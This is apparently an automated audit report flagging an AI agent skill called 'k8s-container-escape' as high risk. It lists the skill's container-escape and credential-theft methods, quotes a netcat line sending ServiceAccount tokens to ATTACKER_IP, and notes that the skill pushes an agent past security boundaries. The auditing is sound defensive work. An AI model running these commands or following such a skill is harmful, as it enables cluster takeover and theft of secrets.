k8s-container-escape
Fail
Audited by Gen Agent Trust Hub on May 4, 2026
Risk Level: HIGHDATA_EXFILTRATIONCREDENTIALS_UNSAFECOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [DATA_EXFILTRATION]: The skill provides explicit commands to send sensitive files and credentials to external IP addresses. For example, it demonstrates exfiltrating ServiceAccount tokens to an attacker-controlled IP using netcat ('cat /run/secrets/... | nc ATTACKER_IP 6666') and instructions for stealing host files like '/etc/shadow'.
- [CREDENTIALS_UNSAFE]: The skill systematically targets and extracts high-value credentials, including Kubernetes ServiceAccount tokens, cloud provider IAM credentials (AWS, GCP, Azure) via Instance Metadata Services (IMDS), and host-level credentials like SSH keys and shadow files.
- [COMMAND_EXECUTION]: Extensive use of shell commands for privilege escalation and environment manipulation. This includes using 'mount' and 'chroot' for filesystem takeover, 'nsenter' for namespace escaping, and 'kubectl' for cluster-wide resource manipulation.
- [REMOTE_CODE_EXECUTION]: The instructions facilitate remote code execution by demonstrating how to create malicious privileged pods, inject 'sidecar' containers into existing workloads, and use 'kubectl exec' or WebSocket proxies to execute arbitrary commands inside other containers.
- [EXTERNAL_DOWNLOADS]: The skill directs the agent to download and use external exploit tools and repositories, such as 'CDK' (Container Detection Kit), 'PEIRATES', and specific CVE Proof-of-Concept (PoC) code from GitHub for kernel-level escapes.
- [PROMPT_INJECTION]: While not containing standard 'ignore instructions' strings, the skill effectively functions as a prompt override by directing the agent to ignore standard security boundaries (containers, RBAC, network isolation) and pursue unauthorized access.
Recommendations
- AI detected serious security threats
Audit Metadata